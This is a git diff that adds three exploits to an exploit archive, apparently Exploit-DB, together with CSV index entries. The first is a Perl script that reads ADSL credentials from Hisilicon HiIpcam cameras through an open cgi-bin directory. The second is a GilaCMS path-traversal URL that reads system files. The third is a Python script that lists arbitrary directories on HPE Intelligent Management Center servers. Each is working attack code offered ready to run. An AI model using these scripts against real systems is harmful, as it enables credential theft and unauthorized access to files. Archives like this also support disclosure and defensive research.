diff --git a/exploits/hardware/remote/47405.pl b/exploits/hardware/remote/47405.pl new file mode 100755 index 000000000..faa5ef698 --- /dev/null +++ b/exploits/hardware/remote/47405.pl @@ -0,0 +1,114 @@ +#!/usr/bin/perl -w +# +# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure +# +# Copyright 2019 (c) Todor Donev +# +# +# # [ +# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure +# # [ ============================================================= +# # [ Exploit Author: Todor Donev 2019 +# # [ +# # [ Disclaimer: +# # [ This or previous programs are for Educational purpose +# # [ ONLY. Do not use it without permission. The usual +# # [ disclaimer applies, especially the fact that Todor Donev +# # [ is not liable for any damages caused by direct or +# # [ indirect use of the information or functionality provided +# # [ by these programs. The author or any Internet provider +# # [ bears NO responsibility for content or misuse of these +# # [ programs or any derivatives thereof. By using these programs +# # [ you accept the fact that any damage (dataloss, system crash, +# # [ system compromise, etc.) caused by the use of these programs +# # [ are not Todor Donev's responsibility. +# # [ +# # [ Use them at your own risk! +# # [ +# # [ Initializing the browser +# # [ Server: thttpd/2.25b 29dec2003 +# # [ The target is vulnerable +# # [ +# # [ Directory Traversal +# # [ +# # [ /cgi-bin/.. +# # [ /cgi-bin/adsl_init.cgi +# # [ /cgi-bin/chkwifi.cgi +# # [ /cgi-bin/ddns_start.cgi +# # [ /cgi-bin/getadslattr.cgi +# # [ /cgi-bin/getddnsattr.cgi +# # [ /cgi-bin/getinetattr.cgi +# # [ /cgi-bin/getinterip.cgi +# # [ /cgi-bin/getnettype.cgi +# # [ /cgi-bin/getupnp.cgi +# # [ /cgi-bin/getwifi.cgi +# # [ /cgi-bin/getwifiattr.cgi +# # [ /cgi-bin/ptzctrldown.cgi +# # [ /cgi-bin/ptzctrlleft.cgi +# # [ /cgi-bin/ptzctrlright.cgi +# # [ /cgi-bin/ptzctrlup.cgi +# # [ /cgi-bin/ptzctrlzoomin.cgi +# # [ /cgi-bin/ptzctrlzoomout.cgi +# # [ /cgi-bin/ser.cgi +# # [ /cgi-bin/setadslattr.cgi +# # [ /cgi-bin/setddnsattr.cgi +# # [ /cgi-bin/setinetattr.cgi +# # [ /cgi-bin/setwifiattr.cgi +# # [ /cgi-bin/testwifi.cgi +# # [ /cgi-bin/upnp_start.cgi +# # [ /cgi-bin/upnp_stop.cgi +# # [ /cgi-bin/wifi_start.cgi +# # [ /cgi-bin/wifi_stop.cgi +# # [ +# # [ File Reading +# # [ +# # [ var ip = "" ; +# # [ var adslenable = "" ; +# # [ var username = "hacker" ; +# # [ var password = "133337" ; +# # [ var dnsauto = "1" ; +# # [ var dns1 = "8.8.8.8" ; +# # [ var dns2 = "8.8.4.4" ; +# +# +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use HTML::TreeBuilder; +$| = 1; +my $host = shift || 'https://192.168.1.1/'; # Full path url to the store +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 + +my $banner = "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a"; + +print $banner; + +print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/); +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +my $target = $host."/cgi-bin/"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401'); +print "[ Server: ", $response->header('Server'), "\n"; +if (defined ($response->as_string()) && ($response->as_string() =~ m/

Index of \/cgi-bin\/<\/H2>/)){ + print "[ The target is vulnerable\n"; + print "[\n[ Directory Traversal\n"; + my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); + my @files = $tree->look_down(_tag => 'a'); + print "[ ", $_->attr('href'), "\n" for @files; + my $target = $host."/cgi-bin/getadslattr.cgi"; + my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); + my $response = $browser->request($request) or die "[ Exploit Failed: $!"; + print "[\n[ File Reading\n"; + print "[ ", $_, "\n" for split(/\n/,$response->content()); + +} else { + print "[ Exploit failed! The target isn't vulnerable\n"; + exit; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/47407.txt b/exploits/multiple/webapps/47407.txt new file mode 100644 index 000000000..752ca3030 --- /dev/null +++ b/exploits/multiple/webapps/47407.txt @@ -0,0 +1,18 @@ +# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS +# Google Dork: N/A +# Date: 04-08-2019 +# Exploit Author: Sainadh Jamalpur +# Vendor Homepage: https://github.com/GilaCMS/gila +# Software Link: https://github.com/GilaCMS/gila +# Version: 1.10.9 +# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, +# CVE : CVE-2019-16679 + +*********** *Steps to reproduce the Vulnerability* ************* + +Login into the application as an admin user or equivalent user and go the +below link + +http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts + +################################################################ \ No newline at end of file diff --git a/exploits/watchos/remote/47408.py b/exploits/watchos/remote/47408.py new file mode 100755 index 000000000..0a7046a09 --- /dev/null +++ b/exploits/watchos/remote/47408.py @@ -0,0 +1,88 @@ +#!/opt/local/bin/python2.7 + +# Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure +# Date: 22-09-2019 +# Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991) +# Vendor Homepage: www.hpe.com +# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber= +# Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win +# Tested on: Windows 7 +# CVE : CVE-2019-5392 +# Conversion of Nessus Plugin to Python Exploit +# Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl +# Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user. +# See Also: https://www.tenable.com/plugins/nessus/118038 + +from pyasn1.type.univ import * +from pyasn1.type.namedtype import * +from pyasn1.codec.ber import encoder +import struct +import binascii +import socket, sys +import sys +import re + +if len(sys.argv) != 4: + print "USAGE: python %s " % (sys.argv[0]) + sys.exit(1) +else: + ip = sys.argv[1] + port = int(sys.argv[2]) # Default Port 2810 + directory = sys.argv[3] + payload = directory.replace("\\","\\\\") + opcode = 10001 + +try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print "Socket Created.." +except socket.error: + print 'Failed to create socket' + sys.exit() +victim_address = (ip,port) +print('connecting to {} port {}'.format(*victim_address)) +sock.connect((ip, port)) + +class DbmanMsg(Sequence): + componentType = NamedTypes( + NamedType('flag', Integer()), + NamedType('dir', OctetString()) + ) + +data = DbmanMsg() +data['flag'] = 1 +data['dir'] = payload +encodeddata = encoder.encode(data, defMode=False) +dataLen = len(encodeddata) +values = (opcode, dataLen, encodeddata) +s = struct.Struct(">ii%ds" % dataLen) +packed_data = s.pack(*values) +print 'Format string :', s.format +print 'Uses :',s.size, 'bytes' +print 'Packed Value :', binascii.hexlify(packed_data) +print '\n' +print 'Sending Payload...' +sock.send(packed_data) +BUFF_SIZE = 4000 +res = sock.recv(BUFF_SIZE) +rec = len(res) +if (rec == 0): + print "No data in the directory" +else: + print "Data Recived: "+str(rec) + a = repr(res) + b = a + b = re.sub(r'(x\d\d)', '', b) + b = re.sub(r'(\\x[\d].)', '', b) + b = re.sub(r'(\\x..)', '', b) + replacestring = ['"','\\n','\\r','\\t','0'] + print "Data in "+payload+" Directory: \n" + for r in replacestring: + b = b.replace(r,'') + b = b.replace("'","") + #print b #Remove '#' if output results is not proper + matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE) + for matchNum, match in enumerate(matches, start=1): + + print match.group(2) +print "Done..." +sock.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b16c4881d..0c4070120 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17674,6 +17674,8 @@ id,file,description,date,author,type,platform,port 47375,exploits/linux/remote/47375.rb,"LibreNMS - Collectd Command Injection (Metasploit)",2019-09-10,Metasploit,remote,linux, 47376,exploits/php/remote/47376.rb,"October CMS - Upload Protection Bypass Code Execution (Metasploit)",2019-09-10,Metasploit,remote,php, 47390,exploits/hardware/remote/47390.txt,"Inteno IOPSYS Gateway - Improper Access Restrictions",2019-09-16,"Gerard Fuguet",remote,hardware, +47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware, +47408,exploits/watchos/remote/47408.py,"HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure",2019-09-23,"Lazy Hacker",remote,watchos, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41746,3 +41748,4 @@ id,file,description,date,author,type,platform,port 47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php, 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php, 47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php, +47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,